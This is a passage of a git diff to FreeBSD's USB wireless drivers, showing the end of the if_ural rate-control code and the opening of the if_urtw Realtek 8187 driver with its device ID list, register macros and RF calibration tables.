&ok, &retrycnt); (void) ieee80211_ratectl_rate(ni, NULL, 0); ifp->if_oerrors += fail; /* count TX retry-fail as Tx errors */ usb_callout_reset(&uvp->ratectl_ch, hz, ural_ratectl_timeout, uvp); RAL_UNLOCK(sc); ieee80211_free_node(ni); } static int ural_pause(struct ural_softc *sc, int timeout) { usb_pause_mtx(&sc->sc_mtx, timeout); return (0); } diff --git a/sys/dev/usb/wlan/if_urtw.c b/sys/dev/usb/wlan/if_urtw.c index aadc74ce507f..a5516339fb41 100644 --- a/sys/dev/usb/wlan/if_urtw.c +++ b/sys/dev/usb/wlan/if_urtw.c @@ -1,4483 +1,4483 @@ /*- * Copyright (c) 2008 Weongyo Jeong * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include "usbdevs.h" #include #include static SYSCTL_NODE(_hw_usb, OID_AUTO, urtw, CTLFLAG_RW, 0, "USB Realtek 8187L"); #ifdef URTW_DEBUG int urtw_debug = 0; SYSCTL_INT(_hw_usb_urtw, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_TUN, &urtw_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.usb.urtw.debug", &urtw_debug); enum { URTW_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ URTW_DEBUG_RECV = 0x00000002, /* basic recv operation */ URTW_DEBUG_RESET = 0x00000004, /* reset processing */ URTW_DEBUG_TX_PROC = 0x00000008, /* tx ISR proc */ URTW_DEBUG_RX_PROC = 0x00000010, /* rx ISR proc */ URTW_DEBUG_STATE = 0x00000020, /* 802.11 state transitions */ URTW_DEBUG_STAT = 0x00000040, /* statistic */ URTW_DEBUG_INIT = 0x00000080, /* initialization of dev */ URTW_DEBUG_TXSTATUS = 0x00000100, /* tx status */ URTW_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #endif static int urtw_preamble_mode = URTW_PREAMBLE_MODE_LONG; SYSCTL_INT(_hw_usb_urtw, OID_AUTO, preamble_mode, CTLFLAG_RW | CTLFLAG_TUN, &urtw_preamble_mode, 0, "set the preable mode (long or short)"); TUNABLE_INT("hw.usb.urtw.preamble_mode", &urtw_preamble_mode); /* recognized device vendors/products */ #define urtw_lookup(v, p) \ ((const struct urtw_type *)usb_lookup(urtw_devs, v, p)) #define URTW_DEV_B(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, URTW_REV_RTL8187B) } #define URTW_DEV_L(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, URTW_REV_RTL8187L) } #define URTW_REV_RTL8187B 0 #define URTW_REV_RTL8187L 1 static const STRUCT_USB_HOST_ID urtw_devs[] = { URTW_DEV_B(NETGEAR, WG111V3), URTW_DEV_B(REALTEK, RTL8187B_0), URTW_DEV_B(REALTEK, RTL8187B_1), URTW_DEV_B(REALTEK, RTL8187B_2), URTW_DEV_B(SITECOMEU, WL168V4), URTW_DEV_L(ASUS, P5B_WIFI), URTW_DEV_L(BELKIN, F5D7050E), URTW_DEV_L(LINKSYS4, WUSB54GCV2), URTW_DEV_L(NETGEAR, WG111V2), URTW_DEV_L(REALTEK, RTL8187), URTW_DEV_L(SITECOMEU, WL168V1), URTW_DEV_L(SURECOM, EP9001G2A), { USB_VPI(USB_VENDOR_OVISLINK, 0x8187, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_DICKSMITH, 0x9401, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_HP, 0xca02, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_LOGITEC, 0x010c, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_NETGEAR, 0x6100, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_SPHAIRON, 0x0150, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_QCOM, 0x6232, URTW_REV_RTL8187L) }, #undef URTW_DEV_L #undef URTW_DEV_B }; #define urtw_read8_m(sc, val, data) do { \ error = urtw_read8_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_write8_m(sc, val, data) do { \ error = urtw_write8_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_read16_m(sc, val, data) do { \ error = urtw_read16_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_write16_m(sc, val, data) do { \ error = urtw_write16_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_read32_m(sc, val, data) do { \ error = urtw_read32_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_write32_m(sc, val, data) do { \ error = urtw_write32_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_8187_write_phy_ofdm(sc, val, data) do { \ error = urtw_8187_write_phy_ofdm_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_8187_write_phy_cck(sc, val, data) do { \ error = urtw_8187_write_phy_cck_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_8225_write(sc, val, data) do { \ error = urtw_8225_write_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) struct urtw_pair { uint32_t reg; uint32_t val; }; static uint8_t urtw_8225_agc[] = { 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9d, 0x9c, 0x9b, 0x9a, 0x99, 0x98, 0x97, 0x96, 0x95, 0x94, 0x93, 0x92, 0x91, 0x90, 0x8f, 0x8e, 0x8d, 0x8c, 0x8b, 0x8a, 0x89, 0x88, 0x87, 0x86, 0x85, 0x84, 0x83, 0x82, 0x81, 0x80, 0x3f, 0x3e, 0x3d, 0x3c, 0x3b, 0x3a, 0x39, 0x38, 0x37, 0x36, 0x35, 0x34, 0x33, 0x32, 0x31, 0x30, 0x2f, 0x2e, 0x2d, 0x2c, 0x2b, 0x2a, 0x29, 0x28, 0x27, 0x26, 0x25, 0x24, 0x23, 0x22, 0x21, 0x20, 0x1f, 0x1e, 0x1d, 0x1c, 0x1b, 0x1a, 0x19, 0x18, 0x17, 0x16, 0x15, 0x14, 0x13, 0x12, 0x11, 0x10, 0x0f, 0x0e, 0x0d, 0x0c, 0x0b, 0x0a, 0x09, 0x08, 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01 }; static uint8_t urtw_8225z2_agc[] = { 0x5e, 0x5e, 0x5e, 0x5e, 0x5d, 0x5b, 0x59, 0x57, 0x55, 0x53, 0x51, 0x4f, 0x4d, 0x4b, 0x49, 0x47, 0x45, 0x43, 0x41, 0x3f, 0x3d, 0x3b, 0x39, 0x37, 0x35, 0x33, 0x31, 0x2f, 0x2d, 0x2b, 0x29, 0x27, 0x25, 0x23, 0x21, 0x1f, 0x1d, 0x1b, 0x19, 0x17, 0x15, 0x13, 0x11, 0x0f, 0x0d, 0x0b, 0x09, 0x07, 0x05, 0x03, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x26, 0x27, 0x27, 0x28, 0x28, 0x29, 0x2a, 0x2a, 0x2a, 0x2b, 0x2b, 0x2b, 0x2c, 0x2c, 0x2c, 0x2d, 0x2d, 0x2d, 0x2d, 0x2e, 0x2e, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x30, 0x30, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31 }; static uint32_t urtw_8225_channel[] = { 0x0000, /* dummy channel 0 */ 0x085c, /* 1 */ 0x08dc, /* 2 */ 0x095c, /* 3 */ 0x09dc, /* 4 */ 0x0a5c, /* 5 */ 0x0adc, /* 6 */ 0x0b5c, /* 7 */ 0x0bdc, /* 8 */ 0x0c5c, /* 9 */ 0x0cdc, /* 10 */ 0x0d5c, /* 11 */ 0x0ddc, /* 12 */ 0x0e5c, /* 13 */ 0x0f72, /* 14 */ }; static uint8_t urtw_8225_gain[] = { 0x23, 0x88, 0x7c, 0xa5, /* -82dbm */ 0x23, 0x88, 0x7c, 0xb5, /* -82dbm */ 0x23, 0x88, 0x7c, 0xc5, /* -82dbm */ 0x33, 0x80, 0x79, 0xc5, /* -78dbm */ 0x43, 0x78, 0x76, 0xc5, /* -74dbm */ 0x53, 0x60, 0x73, 0xc5, /* -70dbm */ 0x63, 0x58, 0x70, 0xc5, /* -66dbm */ }; static struct urtw_pair urtw_8225_rf_part1[] = { { 0x00, 0x0067 }, { 0x01, 0x0fe0 }, { 0x02, 0x044d }, { 0x03, 0x0441 }, { 0x04, 0x0486 }, { 0x05, 0x0bc0 }, { 0x06, 0x0ae6 }, { 0x07, 0x082a }, { 0x08, 0x001f }, { 0x09, 0x0334 }, { 0x0a, 0x0fd4 }, { 0x0b, 0x0391 }, { 0x0c, 0x0050 }, { 0x0d, 0x06db }, { 0x0e, 0x0029 }, { 0x0f, 0x0914 }, }; static struct urtw_pair urtw_8225_rf_part2[] = { { 0x00, 0x01 }, { 0x01, 0x02 }, { 0x02, 0x42 }, { 0x03, 0x00 }, { 0x04, 0x00 }, { 0x05, 0x00 }, { 0x06, 0x40 }, { 0x07, 0x00 }, { 0x08, 0x40 }, { 0x09, 0xfe }, { 0x0a, 0x09 }, { 0x0b, 0x80 }, { 0x0c, 0x01 }, { 0x0e, 0xd3 }, { 0x0f, 0x38 }, { 0x10, 0x84 }, { 0x11, 0x06 }, { 0x12, 0x20 }, { 0x13, 0x20 }, { 0x14, 0x00 }, { 0x15, 0x40 }, { 0x16, 0x00 }, { 0x17, 0x40 }, { 0x18, 0xef }, { 0x19, 0x19 }, { 0x1a, 0x20 }, { 0x1b, 0x76 }, { 0x1c, 0x04 }, { 0x1e, 0x95 }, { 0x1f, 0x75 }, { 0x20, 0x1f }, { 0x21, 0x27 }, { 0x22, 0x16 }, { 0x24, 0x46 }, { 0x25, 0x20 }, { 0x26, 0x90 }, { 0x27, 0x88 } }; static struct urtw_pair urtw_8225_rf_part3[] = { { 0x00, 0x98 }, { 0x03, 0x20 }, { 0x04, 0x7e }, { 0x05, 0x12 }, { 0x06, 0xfc }, { 0x07, 0x78 }, { 0x08, 0x2e }, { 0x10, 0x9b }, { 0x11, 0x88 }, { 0x12, 0x47 }, { 0x13, 0xd0 }, { 0x19, 0x00 }, { 0x1a, 0xa0 }, { 0x1b, 0x08 }, { 0x40, 0x86 }, { 0x41, 0x8d }, { 0x42, 0x15 }, { 0x43, 0x18 }, { 0x44, 0x1f }, { 0x45, 0x1e }, { 0x46, 0x1a }, { 0x47, 0x15 }, { 0x48, 0x10 }, { 0x49, 0x0a }, { 0x4a, 0x05 }, { 0x4b, 0x02 }, { 0x4c, 0x05 } }; static uint16_t urtw_8225_rxgain[] = { 0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0408, 0x0409, 0x040a, 0x040b, 0x0502, 0x0503, 0x0504, 0x0505, 0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0580, 0x0581, 0x0582, 0x0583, 0x0584, 0x0585, 0x0588, 0x0589, 0x058a, 0x058b, 0x0643, 0x0644, 0x0645, 0x0680, 0x0681, 0x0682, 0x0683, 0x0684, 0x0685, 0x0688, 0x0689, 0x068a, 0x068b, 0x068c, 0x0742, 0x0743, 0x0744, 0x0745, 0x0780, 0x0781, 0x0782, 0x0783, 0x0784, 0x0785, 0x0788, 0x0789, 0x078a, 0x078b, 0x078c, 0x078d, 0x0790, 0x0791, 0x0792, 0x0793, 0x0794, 0x0795, 0x0798, 0x0799, 0x079a, 0x079b, 0x079c, 0x079d, 0x07a0, 0x07a1, 0x07a2, 0x07a3, 0x07a4, 0x07a5, 0x07a8, 0x07a9, 0x07aa, 0x07ab, 0x07ac, 0x07ad, 0x07b0, 0x07b1, 0x07b2, 0x07b3, 0x07b4, 0x07b5, 0x07b8, 0x07b9, 0x07ba, 0x07bb, 0x07bb }; static uint8_t urtw_8225_threshold[] = { 0x8d, 0x8d, 0x8d, 0x8d, 0x9d, 0xad, 0xbd, }; static uint8_t urtw_8225_tx_gain_cck_ofdm[] = { 0x02, 0x06, 0x0e, 0x1e, 0x3e, 0x7e }; static uint8_t urtw_8225_txpwr_cck[] = { 0x18, 0x17, 0x15, 0x11, 0x0c, 0x08, 0x04, 0x02, 0x1b, 0x1a, 0x17, 0x13, 0x0e, 0x09, 0x04, 0x02, 0x1f, 0x1e, 0x1a, 0x15, 0x10, 0x0a, 0x05, 0x02, 0x22, 0x21, 0x1d, 0x18, 0x11, 0x0b, 0x06, 0x02, 0x26, 0x25, 0x21, 0x1b, 0x14, 0x0d, 0x06, 0x03, 0x2b, 0x2a, 0x25, 0x1e, 0x16, 0x0e, 0x07, 0x03 }; static uint8_t urtw_8225_txpwr_cck_ch14[] = { 0x18, 0x17, 0x15, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x1b, 0x1a, 0x17, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x1e, 0x1a, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x22, 0x21, 0x1d, 0x11, 0x00, 0x00, 0x00, 0x00, 0x26, 0x25, 0x21, 0x13, 0x00, 0x00, 0x00, 0x00, 0x2b, 0x2a, 0x25, 0x15, 0x00, 0x00, 0x00, 0x00 }; static uint8_t urtw_8225_txpwr_ofdm[]={ 0x80, 0x90, 0xa2, 0xb5, 0xcb, 0xe4 }; static uint8_t urtw_8225v2_gain_bg[]={ 0x23, 0x15, 0xa5, /* -82-1dbm */ 0x23, 0x15, 0xb5, /* -82-2dbm */ 0x23, 0x15, 0xc5, /* -82-3dbm */ 0x33, 0x15, 0xc5, /* -78dbm */ 0x43, 0x15, 0xc5, /* -74dbm */ 0x53, 0x15, 0xc5, /* -70dbm */ 0x63, 0x15, 0xc5, /* -66dbm */ }; static struct urtw_pair urtw_8225v2_rf_part1[] = { { 0x00, 0x02bf }, { 0x01, 0x0ee0 }, { 0x02, 0x044d }, { 0x03, 0x0441 }, { 0x04, 0x08c3 }, { 0x05, 0x0c72 }, { 0x06, 0x00e6 }, { 0x07, 0x082a }, { 0x08, 0x003f }, { 0x09, 0x0335 }, { 0x0a, 0x09d4 }, { 0x0b, 0x07bb }, { 0x0c, 0x0850 }, { 0x0d, 0x0cdf }, { 0x0e, 0x002b }, { 0x0f, 0x0114 } }; static struct urtw_pair urtw_8225v2b_rf_part0[] = { { 0x00, 0x00b7 }, { 0x01, 0x0ee0 }, { 0x02, 0x044d }, { 0x03, 0x0441 }, { 0x04, 0x08c3 }, { 0x05, 0x0c72 }, { 0x06, 0x00e6 }, { 0x07, 0x082a }, { 0x08, 0x003f }, { 0x09, 0x0335 }, { 0x0a, 0x09d4 }, { 0x0b, 0x07bb }, { 0x0c, 0x0850 }, { 0x0d, 0x0cdf }, { 0x0e, 0x002b }, { 0x0f, 0x0114 } }; static struct urtw_pair urtw_8225v2b_rf_part1[] = { {0x0f0, 0x32}, {0x0f1, 0x32}, {0x0f2, 0x00}, {0x0f3, 0x00}, {0x0f4, 0x32}, {0x0f5, 0x43}, {0x0f6, 0x00}, {0x0f7, 0x00}, {0x0f8, 0x46}, {0x0f9, 0xa4}, {0x0fa, 0x00}, {0x0fb, 0x00}, {0x0fc, 0x96}, {0x0fd, 0xa4}, {0x0fe, 0x00}, {0x0ff, 0x00}, {0x158, 0x4b}, {0x159, 0x00}, {0x15a, 0x4b}, {0x15b, 0x00}, {0x160, 0x4b}, {0x161, 0x09}, {0x162, 0x4b}, {0x163, 0x09}, {0x1ce, 0x0f}, {0x1cf, 0x00}, {0x1e0, 0xff}, {0x1e1, 0x0f}, {0x1e2, 0x00}, {0x1f0, 0x4e}, {0x1f1, 0x01}, {0x1f2, 0x02}, {0x1f3, 0x03}, {0x1f4, 0x04}, {0x1f5, 0x05}, {0x1f6, 0x06}, {0x1f7, 0x07}, {0x1f8, 0x08}, {0x24e, 0x00}, {0x20c, 0x04}, {0x221, 0x61}, {0x222, 0x68}, {0x223, 0x6f}, {0x224, 0x76}, {0x225, 0x7d}, {0x226, 0x84}, {0x227, 0x8d}, {0x24d, 0x08}, {0x250, 0x05}, {0x251, 0xf5}, {0x252, 0x04}, {0x253, 0xa0}, {0x254, 0x1f}, {0x255, 0x23}, {0x256, 0x45}, {0x257, 0x67}, {0x258, 0x08}, {0x259, 0x08}, {0x25a, 0x08}, {0x25b, 0x08}, {0x260, 0x08}, {0x261, 0x08}, {0x262, 0x08}, {0x263, 0x08}, {0x264, 0xcf}, {0x272, 0x56}, {0x273, 0x9a}, {0x034, 0xf0}, {0x035, 0x0f}, {0x05b, 0x40}, {0x084, 0x88}, {0x085, 0x24}, {0x088, 0x54}, {0x08b, 0xb8}, {0x08c, 0x07}, {0x08d, 0x00}, {0x094, 0x1b}, {0x095, 0x12}, {0x096, 0x00}, {0x097, 0x06}, {0x09d, 0x1a}, {0x09f, 0x10}, {0x0b4, 0x22}, {0x0be, 0x80}, {0x0db, 0x00}, {0x0ee, 0x00}, {0x091, 0x03}, {0x24c, 0x00}, {0x39f, 0x00}, {0x08c, 0x01}, {0x08d, 0x10}, {0x08e, 0x08}, {0x08f, 0x00} }; static struct urtw_pair urtw_8225v2_rf_part2[] = { { 0x00, 0x01 }, { 0x01, 0x02 }, { 0x02, 0x42 }, { 0x03, 0x00 }, { 0x04, 0x00 }, { 0x05, 0x00 }, { 0x06, 0x40 }, { 0x07, 0x00 }, { 0x08, 0x40 }, { 0x09, 0xfe }, { 0x0a, 0x08 }, { 0x0b, 0x80 }, { 0x0c, 0x01 }, { 0x0d, 0x43 }, { 0x0e, 0xd3 }, { 0x0f, 0x38 }, { 0x10, 0x84 }, { 0x11, 0x07 }, { 0x12, 0x20 }, { 0x13, 0x20 }, { 0x14, 0x00 }, { 0x15, 0x40 }, { 0x16, 0x00 }, { 0x17, 0x40 }, { 0x18, 0xef }, { 0x19, 0x19 }, { 0x1a, 0x20 }, { 0x1b, 0x15 }, { 0x1c, 0x04 }, { 0x1d, 0xc5 }, { 0x1e, 0x95 }, { 0x1f, 0x75 }, { 0x20, 0x1f }, { 0x21, 0x17 }, { 0x22, 0x16 }, { 0x23, 0x80 }, { 0x24, 0x46 }, { 0x25, 0x00 }, { 0x26, 0x90 }, { 0x27, 0x88 } }; static struct urtw_pair urtw_8225v2b_rf_part2[] = { { 0x00, 0x10 }, { 0x01, 0x0d }, { 0x02, 0x01 }, { 0x03, 0x00 }, { 0x04, 0x14 }, { 0x05, 0xfb }, { 0x06, 0xfb }, { 0x07, 0x60 }, { 0x08, 0x00 }, { 0x09, 0x60 }, { 0x0a, 0x00 }, { 0x0b, 0x00 }, { 0x0c, 0x00 }, { 0x0d, 0x5c }, { 0x0e, 0x00 }, { 0x0f, 0x00 }, { 0x10, 0x40 }, { 0x11, 0x00 }, { 0x12, 0x40 }, { 0x13, 0x00 }, { 0x14, 0x00 }, { 0x15, 0x00 }, { 0x16, 0xa8 }, { 0x17, 0x26 }, { 0x18, 0x32 }, { 0x19, 0x33 }, { 0x1a, 0x07 }, { 0x1b, 0xa5 }, { 0x1c, 0x6f }, { 0x1d, 0x55 }, { 0x1e, 0xc8 }, { 0x1f, 0xb3 }, { 0x20, 0x0a }, { 0x21, 0xe1 }, { 0x22, 0x2C }, { 0x23, 0x8a }, { 0x24, 0x86 }, { 0x25, 0x83 }, { 0x26, 0x34 }, { 0x27, 0x0f }, { 0x28, 0x4f }, { 0x29, 0x24 }, { 0x2a, 0x6f }, { 0x2b, 0xc2 }, { 0x2c, 0x6b }, { 0x2d, 0x40 }, { 0x2e, 0x80 }, { 0x2f, 0x00 }, { 0x30, 0xc0 }, { 0x31, 0xc1 }, { 0x32, 0x58 }, { 0x33, 0xf1 }, { 0x34, 0x00 }, { 0x35, 0xe4 }, { 0x36, 0x90 }, { 0x37, 0x3e }, { 0x38, 0x6d }, { 0x39, 0x3c }, { 0x3a, 0xfb }, { 0x3b, 0x07 } }; static struct urtw_pair urtw_8225v2_rf_part3[] = { { 0x00, 0x98 }, { 0x03, 0x20 }, { 0x04, 0x7e }, { 0x05, 0x12 }, { 0x06, 0xfc }, { 0x07, 0x78 }, { 0x08, 0x2e }, { 0x09, 0x11 }, { 0x0a, 0x17 }, { 0x0b, 0x11 }, { 0x10, 0x9b }, { 0x11, 0x88 }, { 0x12, 0x47 }, { 0x13, 0xd0 }, { 0x19, 0x00 }, { 0x1a, 0xa0 }, { 0x1b, 0x08 }, { 0x1d, 0x00 }, { 0x40, 0x86 }, { 0x41, 0x9d }, { 0x42, 0x15 }, { 0x43, 0x18 }, { 0x44, 0x36 }, { 0x45, 0x35 }, { 0x46, 0x2e }, { 0x47, 0x25 }, { 0x48, 0x1c }, { 0x49, 0x12 }, { 0x4a, 0x09 }, { 0x4b, 0x04 }, { 0x4c, 0x05 } }; static uint16_t urtw_8225v2_rxgain[] = { 0x0000, 0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0008, 0x0009, 0x000a, 0x000b, 0x0102, 0x0103, 0x0104, 0x0105, 0x0140, 0x0141, 0x0142, 0x0143, 0x0144, 0x0145, 0x0180, 0x0181, 0x0182, 0x0183, 0x0184, 0x0185, 0x0188, 0x0189, 0x018a, 0x018b, 0x0243, 0x0244, 0x0245, 0x0280, 0x0281, 0x0282, 0x0283, 0x0284, 0x0285, 0x0288, 0x0289, 0x028a, 0x028b, 0x028c, 0x0342, 0x0343, 0x0344, 0x0345, 0x0380, 0x0381, 0x0382, 0x0383, 0x0384, 0x0385, 0x0388, 0x0389, 0x038a, 0x038b, 0x038c, 0x038d, 0x0390, 0x0391, 0x0392, 0x0393, 0x0394, 0x0395, 0x0398, 0x0399, 0x039a, 0x039b, 0x039c, 0x039d, 0x03a0, 0x03a1, 0x03a2, 0x03a3, 0x03a4, 0x03a5, 0x03a8, 0x03a9, 0x03aa, 0x03ab, 0x03ac, 0x03ad, 0x03b0, 0x03b1, 0x03b2, 0x03b3, 0x03b4, 0x03b5, 0x03b8, 0x03b9, 0x03ba, 0x03bb, 0x03bb }; static uint16_t urtw_8225v2b_rxgain[] = { 0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0408, 0x0409, 0x040a, 0x040b, 0x0502, 0x0503, 0x0504, 0x0505, 0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0580, 0x0581, 0x0582, 0x0583, 0x0584, 0x0585, 0x0588, 0x0589, 0x058a, 0x058b, 0x0643, 0x0644, 0x0645, 0x0680, 0x0681, 0x0682, 0x0683, 0x0684, 0x0685, 0x0688, 0x0689, 0x068a, 0x068b, 0x068c, 0x0742, 0x0743, 0x0744, 0x0745, 0x0780, 0x0781, 0x0782, 0x0783, 0x0784, 0x0785, 0x0788, 0x0789, 0x078a, 0x078b, 0x078c, 0x078d, 0x0790, 0x0791, 0x0792, 0x0793, 0x0794, 0x0795, 0x0798, 0x0799, 0x079a, 0x079b, 0x079c, 0x079d, 0x07a0, 0x07a1, 0x07a2, 0x07a3, 0x07a4, 0x07a5, 0x07a8, 0x07a9, 0x03aa, 0x03ab, 0x03ac, 0x03ad, 0x03b0, 0x03b1, 0x03b2, 0x03b3, 0x03b4, 0x03b5, 0x03b8, 0x03b9, 0x03ba, 0x03bb, 0x03bb }; static uint8_t urtw_8225v2_tx_gain_cck_ofdm[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, }; static uint8_t urtw_8225v2_txpwr_cck[] = { 0x36, 0x35, 0x2e, 0x25, 0x1c, 0x12, 0x09, 0x04 }; static uint8_t urtw_8225v2_txpwr_cck_ch14[] = { 0x36, 0x35, 0x2e, 0x1b, 0x00, 0x00, 0x00, 0x00 }; static uint8_t urtw_8225v2b_txpwr_cck[] = { 0x36, 0x35, 0x2e, 0x25, 0x1c, 0x12, 0x09, 0x04, 0x30, 0x2f, 0x29, 0x21, 0x19, 0x10, 0x08, 0x03, 0x2b, 0x2a, 0x25, 0x1e, 0x16, 0x0e, 0x07, 0x03, 0x26, 0x25, 0x21, 0x1b, 0x14, 0x0d, 0x06, 0x03 }; static uint8_t urtw_8225v2b_txpwr_cck_ch14[] = { 0x36, 0x35, 0x2e, 0x1b, 0x00, 0x00, 0x00, 0x00, 0x30, 0x2f, 0x29, 0x15, 0x00, 0x00, 0x00, 0x00, 0x30, 0x2f, 0x29, 0x15, 0x00, 0x00, 0x00, 0x00, 0x30, 0x2f, 0x29, 0x15, 0x00, 0x00, 0x00, 0x00 }; static struct urtw_pair urtw_ratetable[] = { { 2, 0 }, { 4, 1 }, { 11, 2 }, { 12, 4 }, { 18, 5 }, { 22, 3 }, { 24, 6 }, { 36, 7 }, { 48, 8 }, { 72, 9 }, { 96, 10 }, { 108, 11 } }; #if 0 static const uint8_t urtw_8187b_reg_table[][3] = { { 0xf0, 0x32, 0 }, { 0xf1, 0x32, 0 }, { 0xf2, 0x00, 0 }, { 0xf3, 0x00, 0 }, { 0xf4, 0x32, 0 }, { 0xf5, 0x43, 0 }, { 0xf6, 0x00, 0 }, { 0xf7, 0x00, 0 }, { 0xf8, 0x46, 0 }, { 0xf9, 0xa4, 0 }, { 0xfa, 0x00, 0 }, { 0xfb, 0x00, 0 }, { 0xfc, 0x96, 0 }, { 0xfd, 0xa4, 0 }, { 0xfe, 0x00, 0 }, { 0xff, 0x00, 0 }, { 0x58, 0x4b, 1 }, { 0x59, 0x00, 1 }, { 0x5a, 0x4b, 1 }, { 0x5b, 0x00, 1 }, { 0x60, 0x4b, 1 }, { 0x61, 0x09, 1 }, { 0x62, 0x4b, 1 }, { 0x63, 0x09, 1 }, { 0xce, 0x0f, 1 }, { 0xcf, 0x00, 1 }, { 0xe0, 0xff, 1 }, { 0xe1, 0x0f, 1 }, { 0xe2, 0x00, 1 }, { 0xf0, 0x4e, 1 }, { 0xf1, 0x01, 1 }, { 0xf2, 0x02, 1 }, { 0xf3, 0x03, 1 }, { 0xf4, 0x04, 1 }, { 0xf5, 0x05, 1 }, { 0xf6, 0x06, 1 }, { 0xf7, 0x07, 1 }, { 0xf8, 0x08, 1 }, { 0x4e, 0x00, 2 }, { 0x0c, 0x04, 2 }, { 0x21, 0x61, 2 }, { 0x22, 0x68, 2 }, { 0x23, 0x6f, 2 }, { 0x24, 0x76, 2 }, { 0x25, 0x7d, 2 }, { 0x26, 0x84, 2 }, { 0x27, 0x8d, 2 }, { 0x4d, 0x08, 2 }, { 0x50, 0x05, 2 }, { 0x51, 0xf5, 2 }, { 0x52, 0x04, 2 }, { 0x53, 0xa0, 2 }, { 0x54, 0x1f, 2 }, { 0x55, 0x23, 2 }, { 0x56, 0x45, 2 }, { 0x57, 0x67, 2 }, { 0x58, 0x08, 2 }, { 0x59, 0x08, 2 }, { 0x5a, 0x08, 2 }, { 0x5b, 0x08, 2 }, { 0x60, 0x08, 2 }, { 0x61, 0x08, 2 }, { 0x62, 0x08, 2 }, { 0x63, 0x08, 2 }, { 0x64, 0xcf, 2 }, { 0x72, 0x56, 2 }, { 0x73, 0x9a, 2 }, { 0x34, 0xf0, 0 }, { 0x35, 0x0f, 0 }, { 0x5b, 0x40, 0 }, { 0x84, 0x88, 0 }, { 0x85, 0x24, 0 }, { 0x88, 0x54, 0 }, { 0x8b, 0xb8, 0 }, { 0x8c, 0x07, 0 }, { 0x8d, 0x00, 0 }, { 0x94, 0x1b, 0 }, { 0x95, 0x12, 0 }, { 0x96, 0x00, 0 }, { 0x97, 0x06, 0 }, { 0x9d, 0x1a, 0 }, { 0x9f, 0x10, 0 }, { 0xb4, 0x22, 0 }, { 0xbe, 0x80, 0 }, { 0xdb, 0x00, 0 }, { 0xee, 0x00, 0 }, { 0x91, 0x03, 0 }, { 0x4c, 0x00, 2 }, { 0x9f, 0x00, 3 }, { 0x8c, 0x01, 0 }, { 0x8d, 0x10, 0 }, { 